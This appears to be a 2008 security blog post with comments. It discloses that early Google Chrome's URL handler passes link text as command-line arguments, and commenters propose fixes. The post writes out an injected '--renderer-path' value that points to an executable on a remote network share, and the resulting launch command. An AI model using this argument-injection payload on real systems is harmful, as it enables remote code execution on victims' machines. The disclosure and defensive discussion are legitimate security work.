Google Chrome Options
The stuff I am about the discuss are not big deal but we should keep them in mind.
If you haven’t noticed yet, Google Chrome supports a bunch of command line options. You can get a listing of all command line options from chrome_switches.cc. Obviously, some of them look quite powerful. Is that a concern? Well, IMHO, I think so but there is no reason to panic just yet.
Why is this a concern? I will put it this way. There are far too many applications that misbehave when launching links. QuickTime is one of them. Remember QuickTime Pwns Firfox? Mozilla has discontinued the -chrome command line option in order to prevent similar attacks from occurring again. Even if applications do not misbehave and use the windows GUI shell open bindings as they are, attackers can still abuse all options. For example, the browser’s shell open command for http URLs is registered like this:
c:\path\to\chrome.exe "%s"At first glance this seems secure although it is not. Now If I have an app that allows me to click on a user supplied link which contains the following href:
--renderer-path=\\nbtlocation\evil\evil.exeThen the browser will launch like this:
c:\path\to\chrome.exe "--renderer-path=\\nbtlocation\evil\evil.exe"…which is enough to launch chrome with evil.exe as the default renderer. Obviously, this is a remote ownage and although most ISPs wont allow netbios traffic over the Internet, some of them do. Locally, this is very feasible to exploit, especially on WiFi networks.
Chrome is at a very early stage of development and I understand that those features are there because the early adopters will be developers, which is fine. I would say that some of the dangerious options even look very useful for normal users. However, Google might want to consider to include some #ifdefs to ensure that none of the dangerous features are enabled when users download the browser for normal use.
Comments
This is a good point. I think the best way to fix it is not to remove those options, though, but instead to change the shell open command to c:\path\to\chrome.exe — “%s”. Traditionally, — as an argument means “end of options”, specifying that only input files follow. However, an equally effective measure might be c:\path\to\chrome.exe “–url=%s”.
This removes the vulnerability from the shell’s open URL command, but still leaves the flexibility provided by allowing command-line arguments.
hahaha nice, very nice post.
Ryan, yes, this is what Chris Evans suggested as well.
You totally found this file (http://src.chromium.org/svn/trunk/src/chrome/common/chrome_switches.cc) by doing a “find in files” for “file://”! I like your file:// hack for quicktime, how did you know it was a flaw?
Yes, it’s a reasonable defense in depth measure so I’ll make it happen.
I’m highly dissapointed by Chrome. Google had the manpower to create something new and epic, but they failed. I mean what are they doing? copying Webkit and tweaking it a bit?
It’s sad dudes, I’m really dissapointed that no-one in this Universe seems to create a secure browser. For real, it’s that bad!
It’s depressing at most.
10x, Chris. Keep up the good work!
what’s the difference between %s %l and %* ?
I’m inclined to believe that Google is simply testing the waters by releasing Chrome; I also think something truly deceptive is going on in releasing it that I can’t quite grasp.
https://kinqpinz.info/lib/2008/sep/#d5ab0fdf
it’s funny, the more i use Chrome, the more unstable it seems to get… crashes a lot more, can’t handle sites with flash, hangs every time i close a tab… all that to say, i’m switching back to Firefox